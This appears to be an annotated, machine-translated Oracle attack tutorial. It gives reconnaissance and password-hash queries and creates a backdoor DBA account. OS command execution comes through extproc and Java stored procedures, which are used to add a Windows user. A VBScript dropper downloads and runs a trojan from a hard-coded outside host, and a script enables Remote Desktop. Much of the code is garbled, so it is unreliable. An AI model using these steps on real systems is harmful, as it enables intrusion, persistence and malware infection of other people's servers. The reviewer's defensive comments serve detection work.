Author: Robert
Used with the open Tool
Part 1: basic query commands (most of these read DBA_* / V$ views and need DBA or SELECT ANY DICTIONARY)
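-- Part 1: reconnaissance and persistence statements (Oracle).
-- Fixes versus the page as printed: comment markers normalised to SQL `--` (the page used `//` and `\`,
-- which are not SQL comments), string literals quoted, and `v$`/`user$` spacing repaired.
-- Roles are created with unquoted names: the page's quoted lowercase "javauserpriv"/"policyspriv" would
-- create case-sensitive lowercase roles that a later unquoted `grant policyspriv ...` cannot find.

select * from v$pwfile_users;                 -- users in the password file (SYSDBA/SYSOPER holders)
select * from v$version;                      -- Oracle and platform version
select * from session_privs;                  -- system privileges active in this session
select * from user_role_privs;                -- roles granted to the current user
select * from user_sys_privs;                 -- system privileges granted directly to the current user
select username, password from dba_users;     -- password hashes; blank from 11g (hashes live in SYS.USER$)
select * from dba_sys_privs where grantee = 'SYSTEM';   -- system privileges held by SYSTEM

-- Lets SYSTEM read every dictionary view (needed for OEM logon in some setups). WITH ADMIN OPTION
-- lets SYSTEM re-grant it: a broad, persistent grant worth auditing.
grant select any dictionary to system with admin option;

-- Single-user hash on older versions; SYS.USER$ needs SYS or SELECT ANY DICTIONARY.
select name, password from sys.user$ where name = 'SCOTT';
-- Same hashes as above; DECODE(password, NULL, NULL, password) is a pass-through of PASSWORD.
select username, decode(password, null, null, password) as password from dba_users;

-- Persistence: a new DBA account. Both statements are visible in DBA_USERS / DBA_ROLE_PRIVS and in the
-- audit trail when CREATE USER / GRANT auditing is enabled.
create user bob identified by iloveyou;
grant dba to bob;
grant execute on xmldom to bob;               -- XMLDOM is a SYS package; only needed if the Java steps use it

-- Roles the Java steps later expect. JAVAUSERPRIV normally exists once the JVM is installed;
-- create POLICYSPRIV only if the later GRANT reports "role does not exist".
create role javauserpriv not identified;
create role policyspriv not identified;

select grantee from dba_role_privs where granted_role = 'DBA';   -- who already holds DBA
select * from dba_directories;                -- DIRECTORY objects and the OS paths they point at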
Part 2: getting OS command execution from the database
Method 1 — extproc external procedure bound to the C runtime's system() in msvcrt.dll
-- Method 1: OS command execution through extproc. CREATE LIBRARY points Oracle at a host DLL and the
-- external procedure below binds straight to the DLL export "system". Requires CREATE [ANY] LIBRARY and
-- a listener configured for extproc; the command runs as the OS account owning the extproc process,
-- not as the database user.
-- NOTE(review): the transcription is garbled — path separators are missing from the DLL path, and
-- "when md" / "already MD" / "End transaction md" stand where one package name is expected — so this
-- does not compile as printed; reconstruct it from Oracle's EXTERNAL procedure syntax before relying on it.
Create or replace library exec_shell AS c: windowssystem32msvcrt. dll;
/
Show errors
-- Package spec: one procedure taking the command string.
Create or replace package when md is procedure exec (character string in char );
End transaction md;
/
Show errors
-- Package body: a call spec with no PL/SQL logic of its own; every call goes to system().
Create or replace package body already MD IS
PROCEDURE exec (Response string in char)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
Language c;
End transaction md;
/
`Show errors` printing nothing means the objects compiled.
If they did not (typically the DLL path was rejected), use the following variant, which locates msvcrt.dll under $ORACLE_HOME:
-- Variant of method 1: identical objects, but the library path is the msvcrt.dll copy under
-- $ORACLE_HOME (the separator between the variable and the file name is lost in transcription, as are
-- the quotes around the path).
-- NOTE(review): same garbling as above ("when md" / "already MD" / "End transaction md"); the package
-- name must be one consistent identifier for this to compile.
Create or replace library exec_shell AS $ ORACLE_HOMEmsvcrt.dll;
/
Show errors
Create or replace package when md is procedure exec (character string in char );
End transaction md;
/
Show errors
-- Call spec onto the DLL export "system"; no argument validation happens anywhere in this chain.
Create or replace package body already MD IS
PROCEDURE exec (Response string in char)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
Language c;
End transaction md;
/
Once `show errors` reports no compilation errors, run:
-- Invokes the external procedure with `net1 user robert iloveyou /add`, i.e. creates a local Windows
-- account on the database host — a persistence step, not a test. Defenders: local account creation is
-- logged by Windows (Security event 4720) with the Oracle/extproc service account as the subject, and a
-- net1.exe child of the extproc process is itself a strong signal.
-- NOTE(review): the line is garbled ("cmdmd.exe c" appears to be the package call; "no2." is the fused
-- heading of the next method).
Exec cmdmd.exe c (net1 user robert iloveyou/add); no2.
-- Method 2: OS command execution through a Java stored procedure (no extproc needed). The commands run
-- as the OS user that owns the Oracle server process; what makes it work are the Java 2 security grants
-- issued further down with DBMS_JAVA.GRANT_PERMISSION.
-- NOTE(review): the Java below is a damaged transcription — spaces inside identifiers and string
-- literals, the `AS` keyword missing after the object name, "runtime.getruntime(cmd.exe c (" where
-- Runtime.getRuntime().exec(...) appears intended, "OS. name" for "os.name", and the while-conditions
-- missing their opening parenthesis. It does not compile as printed.
Create or replace and compile java source named "Host"
Import java. io .*;
Public class Host {
// Runs `command` via cmd.exe /c on Windows or /bin/sh -c elsewhere and echoes the child's stdout and
// stderr to System.out (visible in SQL*Plus once DBMS_JAVA.SET_OUTPUT has been called).
// The command string is passed to the shell unmodified — arbitrary command execution by design.
Public static void executeCommand (String command ){
Try {
String [] finalCommand;
If (isWindows ()){
FinalCommand = new String [4];
// Use the appropriate path for your windows version.
FinalCommand [0] = "C: \ windows \ system32 \ cmd.exe"; // Windows XP/2003
// FinalCommand [0] = "C: \ winnt \ system32 \ cmd.exe"; // Windows NT/2000
// NOTE(review): the trailing spaces inside these literals look like transcription artifacts;
// a program name of "/bin/sh " (with the space) would not resolve to a file.
FinalCommand [1] = "/y ";
FinalCommand [2] = "/c ";
FinalCommand [3] = command;
}
Else {
FinalCommand = new String [3];
FinalCommand [0] = "/bin/sh ";
FinalCommand [1] = "-c ";
FinalCommand [2] = command;
}
// Defect: waitFor() runs before the reader threads below are started, so a child that fills its
// stdout/stderr pipe buffer blocks forever and this call never returns. Start the readers (or drain
// the streams) first, then wait.
Final Process pr = runtime.getruntime(cmd.exe c (finalCommand );
Pr. waitFor ();
// Reader thread for the child's stdout. The 100 ms sleep per line only slows the copy; it adds nothing.
New Thread (new Runnable (){
Public void run (){
BufferedReader br_in = null;
Try {
Br_in = new BufferedReader (new InputStreamReader (pr. getInputStream ()));
String buff = null;
While (buff = br_in.readLine ())! = Null ){
System. out. println ("Process out:" + buff );
Try {Thread. sleep (100);} catch (Exception e ){}
}
Br_in.close ();
}
Catch (IOException ioe ){
System. out. println ("Exception caught printing process output .");
Ioe. printStackTrace ();
}
Finally {
Try {
Br_in.close ();
} Catch (Exception ex ){}
}
}
}). Start ();
// Reader thread for the child's stderr; mirrors the stdout thread.
New Thread (new Runnable (){
Public void run (){
BufferedReader br_err = null;
Try {
Br_err = new BufferedReader (new InputStreamReader (pr. getErrorStream ()));
String buff = null;
While (buff = br_err.readLine ())! = Null ){
System. out. println ("Process err:" + buff );
Try {Thread. sleep (100);} catch (Exception e ){}
}
Br_err.close ();
}
Catch (IOException ioe ){
System. out. println ("Exception caught printing process error .");
Ioe. printStackTrace ();
}
Finally {
Try {
Br_err.close ();
} Catch (Exception ex ){}
}
}
}). Start ();
}
// Every failure is printed and swallowed: the PL/SQL caller never learns that the command did not run.
Catch (Exception ex ){
System. out. println (ex. getLocalizedMessage ());
}
}
// True when the JVM's os.name contains "windows" (case-insensitive).
Public static boolean isWindows (){
If (System. getProperty ("OS. name"). toLowerCase (). indexOf ("windows ")! =-1)
Return true;
Else
Return false;
}
};
/
-- PL/SQL call spec exposing Host.executeCommand to SQL. Oracle takes the Java signature as a quoted
-- string — NAME 'Host.executeCommand(java.lang.String)' — the quotes and the method name are garbled here.
Create or replace procedure host_command (p_command IN VARCHAR2)
AS LANGUAGE JAVA
NAME Host.exe cuteCommand (java. lang. String );
/
-- Java 2 security grants that let the class above spawn processes: FilePermission (the "<>" is
-- presumably what survived of "<<ALL FILES>>") with read/write/execute/delete, plus RuntimePermission
-- readFileDescriptor/writeFileDescriptor. Granted to SYSTEM, this is OS code execution as the Oracle
-- service account for every SYSTEM session. Review DBA_JAVA_POLICY for grants of this shape; remove
-- them with DBMS_JAVA.REVOKE_PERMISSION. All arguments must be quoted string literals.
EXEC DBMS_JAVA.grant_permission (SYSTEM, java. io. FilePermission, <>, read, write, execute, delete );
EXEC Dbms_Java.Grant_Permission (SYSTEM, SYS: java. lang. RuntimePermission, writeFileDescriptor ,);
EXEC Dbms_Java.Grant_Permission (SYSTEM, SYS: java. lang. RuntimePermission, readFileDescriptor ,);
/
-- Driver for method 2: enable DBMS_OUTPUT, route the Java System.out into it, run one command and read
-- the buffered lines back. "Rochelle output" / "Rochelle lines" are transcription damage for the
-- l_output / l_lines that GET_LINES consumes on the last line; the command argument needs quotes,
-- i.e. host_command('dir C:').
DECLARE
Rochelle output DBMS_OUTPUT.chararr;
Rochelle lines INTEGER: = 1000;
BEGIN
DBMS_OUTPUT.enable (1000000 );
DBMS_JAVA.set_output (1000000 );
Host_command (dir C :);
DBMS_OUTPUT.get_lines (l_output, l_lines );
END; pay attention to two points
Two things to watch: on Windows the cmd.exe path hard-coded in the Java source must match the installed system directory (see the commented-out C:\winnt alternative); on Linux that Windows branch is not taken and /bin/sh -c is used instead.
The last statement is the actual command execution:
Host_command (dir C :);
Method 3 — a Java class that runs a command and returns its exit code as a number:
-- Method 3: like method 2, but RunThis returns the child's exit code and copies only stdout.
-- NOTE(review): garbled transcription again ("rt.exe c (args )" for what appears to be rt.exec(args),
-- missing parenthesis in the while-condition, spaces inside identifiers); it does not compile as printed.
Create or replace and compile
Java souRCe named "util"
As
Import java. io .*;
Import java. lang .*;
Public class util extends Object
{
// Runs `args` as a single command line and returns the process exit code, or -1 on failure.
// Runtime.exec(String) splits the string on whitespace itself — no shell is involved, so pipes,
// redirects and quoting do not work unless the caller passes "cmd /c ..." or "sh -c ..." explicitly.
Public static int RunThis (String args)
{
Runtime rt = Runtime. getRuntime ();
Int RC =-1;
Try
{
Process p = rt.exe c (args );
Int bufSize = 4096;
// Only stdout is drained. A child that writes more than a pipe buffer to stderr will block
// before it exits, and waitFor() below then never returns.
BufferedInputStream bis = new BufferedInputStream (p. getInputStream (), bufSize );
Int len;
Byte buffer [] = new byte [bufSize];
// Echo back what the program spit out
While (len = bis. read (buffer, 0, bufSize ))! =-1)
System. out. write (buffer, 0, len );
RC = p. waitFor ();
}
Catch (Exception e)
{
E. printStackTrace ();
RC =-1;
}
// Defect: `return` inside finally discards anything thrown from the try/catch (javac warns
// "finally clause cannot complete normally"). The return belongs after the try statement.
Finally
{
Return RC;
}
}
}
/
-- Call spec for util.RunThis: takes the command line, returns the exit code as a NUMBER.
-- Oracle expects the Java signature as a quoted string: NAME 'util.RunThis(java.lang.String) return integer';
-- the quotes are lost in this transcription.
Create or replace
Function RUN_CMz (p_cmd in varchar2) return number
As
Language java
Name util. RunThis (java. lang. String) return integer;
/
-- Procedure wrapper around RUN_CMz for callers that cannot use a function. The exit code is assigned
-- to X and then dropped, so a failed command is indistinguishable from a successful one here.
Create or replace procedure RC (p_cmd in varChar)
As
X number;
Begin
X: = RUN_CMz (p_cmd );
End;
/
-- SQL*Plus driver for method 3. `:x` is a bind variable receiving the exit code; SET_OUTPUT makes the
-- Java System.out visible. The GRANT is printed twice (transcription); it only succeeds if a role named
-- POLICYSPRIV exists — the earlier CREATE ROLE used a quoted lowercase name, which this unquoted
-- reference does not match. Last line as intended: exec :x := run_cmz('ipconfig'); — the quotes are
-- gone and the next section's heading is fused onto it.
Variable x number;
Set serveroutput on;
Exec dbms_java.set_output (100000 );
Grant policyspriv to system;
Grant policyspriv to system
Exec: x: = run_cmz (ipconfig); the second part is about operating disk files.
No. 1 — create a DIRECTORY object (UTL_FILE writes through it):
-- DIRECTORY object pointing at the drive root (the backslash after "C:" and the quotes around the path
-- are lost in transcription, as elsewhere on this page). CREATE [ANY] DIRECTORY amounts to file-system
-- access as the Oracle OS user; DBA_DIRECTORIES lists every such object and its path.
Create or replace directory DIR as C:; this directory can also be the startup directory.
Grant access (optional for SYSTEM):
-- The page says this grant is unnecessary here — presumably because SYSTEM's existing privileges
-- already cover the directory; a less privileged grantee would need it. Statement terminator and the
-- fused trailing prose are transcription artifacts.
Grant read, write on directory DIR to system does not need to be used in this step
Then write the file through UTL_FILE:
-- Malware dropper, stage 1: UTL_FILE writes a VBScript into the DIR directory; the script fetches an
-- executable over plain HTTP from a hard-coded host and saves it to the drive root. Stage 2 (next lines)
-- runs both with run_cmz. Do not reuse this.
-- Defensive notes: UTL_FILE writes through a DIRECTORY object that points at a system or root path,
-- and cscript.exe or an unknown .exe spawned by the Oracle server process, are strong host indicators;
-- the unauthenticated HTTP fetch from a fixed domain is a network indicator.
-- NOTE(review): transcription dropped the backslashes — "c: ad.exe" is the c:\rad.exe fetched by the
-- GET below — and the whole VBScript has to be passed as a quoted PL/SQL string literal.
Declare
File utl_file.file_type;
Begin
File: = utl_file.fopen (DIR, test. vbs, W );
-- Script body: Microsoft.XMLHTTP GET, then ADODB.Stream (Mode 3 = read/write, Type 1 = binary,
-- SaveToFile option 2 = overwrite) — the standard VBScript downloader pattern.
Utl_file.put_line (file, Set xPost = CreateObject ("Microsoft. XMLHTTP ")
XPost. Open "GET", "http: // blog.cnmoker.org/rad.exe", 0
XPost. Send ()
Set sGet = CreateObject ("ADODB. Stream ")
SGet. Mode = 3
SGet. Type = 1
SGet. Open ()
SGet. Write (xPost. responseBody)
SGet. SaveToFile "c: ad.exe", 2 );
-- Flush and close so the file is complete before it is executed.
Utl_file.fflush (file );
Utl_file.fclose (file );
End;
/
-- Stage 2: run the dropped script, then the downloaded binary. The paths are apparently c:\test.vbs and
-- c:\rad.exe — the "\t" and "\r" were consumed as escapes in transcription. Both lines are arbitrary
-- code execution as the Oracle OS account; the stray "/" between them is a SQL*Plus artifact.
Exec: x: = run_cmz (cscript c: est. vbs );
/
Exec: x: = run_cmz (c: ad.exe); in this step, download my Trojan to drive c and execute
Declare
File utl_file.file_type;
Begin
File: = utl_file.fopen (DIR, 3389.vbs, W );
Utl_file.put_line (file, Dim OperationRegistry
Set OperationRegistry = WScript. createObject ("WScript. Shell ")
Dim TSPort, TSState, TSRegPath
TSRegPath = "HKLMSystemCurrentControlSetControlTerminal ServerWinStationsRDP-TcpPortNumber"
TSPort = OperationRegistry. RegRead (TSRegPath)
TSRegPath = "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerfDenyTSConnections"
TSState = OperationRegistry. RegRead (TSRegPath)
If TSState = 0 Then
Else
OperationRegistry. RegWrite TSRegPath, 0, "REG_DWORD"
End If );
Utl_file.fflush (file );
Utl_file.fclose (file); <